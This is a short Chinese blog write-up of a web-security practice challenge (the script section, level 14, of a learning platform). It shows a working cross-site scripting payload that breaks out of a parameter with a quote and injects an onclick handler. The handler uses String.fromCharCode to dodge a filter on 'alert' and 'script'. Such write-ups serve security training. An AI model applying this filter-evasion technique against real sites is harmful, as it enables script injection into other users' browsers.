网络信息安全学习平台---脚本关第14题

网络信息安全学习平台---脚本关第14题

时间:2016-09-01 作者:zhankehua 评论:0 点击:2887 次

这一题过虑掉了alert这个函数,以及javascript,script等关键字。这就好办了,首先想到使用String.fromCharCode这个函数
经过对网页代码分析,注入的内容如下:
把脚本 <input type="button" onclick="alert(HackingLab)" value="click me" /> 进行toCharCode转换
s=guest' onclick='document.getElementById("msg").innerHTML=String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,98,117,116,116,111,110,34,32,111,110,99,108,105,99,107,61,34,97,108,101,114,116,40,72,97,99,107,105,110,103,76,97,98,41,34,32,118,97,108,117,101,61,34,99,108,105,99,107,32,109,101,34,32,47,62)
提交查询,然后点击第二个输入框




网络信息安全学习平台---脚本关第14题

本文标签:

转载请注明出处: http://www.itsec365.cn/?id=13

已有 2887 位网友参与,快来吐槽:

发表评论

必填

选填

选填

◎欢迎参与讨论,发表您的看法、交流您的观点。